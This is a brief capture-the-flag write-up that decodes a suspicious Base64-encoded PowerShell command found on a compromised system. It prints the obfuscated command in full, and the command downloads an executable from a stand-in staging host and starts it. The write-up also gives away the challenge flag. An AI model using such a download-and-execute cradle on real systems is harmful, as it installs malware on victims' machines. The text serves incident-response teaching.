Rating:
While investigating an incident, you identify a suspicious powershell command that was run on a compromised system ... can you figure out what it was doing?
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn
In this Powershell command, we can see it runs a command but it appears to be encoded. The -enc flag encodes the payload in Base64, so we can throw it into a Base64 decoder and extact some data.
By using just the encoded payload portion as our input, we can now read the unencoded payload and determine what it's doing.
If it was a real sample, this command would download a executable file from a staging site and start the process on the victim machine.
<details> <summary> Flag Spoiler </summary> MetaCTF{super_sus_st4ging_site_d0t_c0m} </details>
We learned about Powershell encoding functionality, and even further we learned that obfuscation can be achieved in the command flags like -noP because Powershell handles parameter binding in a way that essentially auto-completes the intended flag. More can be found here.
